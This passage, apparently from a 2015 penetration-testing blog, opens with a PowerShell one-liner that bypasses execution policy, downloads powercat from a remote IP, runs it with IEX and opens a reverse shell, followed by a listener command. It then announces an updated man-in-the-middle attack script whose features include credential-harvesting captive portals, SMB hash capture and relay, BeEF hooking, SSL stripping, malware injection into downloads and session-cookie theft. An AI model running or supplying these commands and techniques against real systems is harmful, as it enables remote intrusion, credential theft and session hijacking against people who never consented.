wmi_powercat_cmd

Powershell

powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString(‘http://10.32.155.36/powercat-master/powercat.ps1’); powercat -c 10.32.155.36 -p 8081 –ep

Reverse Shell & Dump DC

PS C:\> powercat –l –p 8081

wmi_powercat_listener1

wmi_powercat_listener2

 
September 16, 2015 by joseph

MiTM Attack Script – UPDATED

The MiTM Attack Script has been updated. I removed and replaced ettercap with bettercap. I also added some new attack vectors including the following:

  1. Captive Portal – Log In Creds / Reverse Shell
    1. Cisco
    2. Microsoft Forefront
    3. Sophos
    4. SQUID
    5. TrendMicro
    6. Fortigate\Fortinet
    7. Flash Updater
    8. Forttinet – Old Style
    9. Custom
  2. Captive Portal – Log In Creds / Reverse Shell with DNS Spoof
    1. Same as above, except with DNS Spoofing
  3. SMB – Hash Grab
    1. Inject a UNC path (in web pages) to the attackers SMB server to capture NetNTLM
  4. SMB – Hash Relay
    1. Inject UNC path (in web pages) to the attackers SMB and relay/replay it to a victim
  5. Web – Beef Hook
    1. Inject a beef hook into web traffic and starts beef
  6. Web – SSL Strip and Capture Traffic
    1. Creates and stores a packet capture
  7. Web – BDFproxy/BDFfactory
    1. Inject malicious code into exe download files
  8. Web – Hamster/Ferret
    1. Intercept web cookies for stealing sessions

mitm2_1

 

https://github.com/jbarcia/MiTM-Framework

 

 

Some other options also include adding SSLstrip to all attacks and for picky gateways half duplex.

SSLstrip

SSLStrip is a type of MITM attack that forces a victim’s browser into communicating with an adversary in plain-text over HTTP, and the adversary proxies the modified content from an HTTPS server. To do this, SSLStrip is “stripping”  https:// URLs and turning them into http:// URLs.

Half Duplex

Half duplex only sends arp poisoning to one target, this would be used when full poisoning is unachievable because the gateway/router would send another request to the real IP of the target asking it again for its mac address, invalidating the ARP cache of the target and fixing it. The –half-duplex command doesn’t send the second ARP packet, not spoofing the router, thus it won’t be able to detect the ARP MITM and fix the targets ARP cache.

Since we (still) don’t have active inspection/manipulation on a packet level, we don’t really need full duplex, so that’ll do the trick if you have issues with ARP poisoning on your network.”

Customizable

Completely customizable options makes portability easy

mitm2_2

————————————————————————————————————-

Please let me know if something isn’t working correctly, this has been tested on a custom Kali 2.0 build.

 
Subscribe!
Casper WP by Lacy Morrow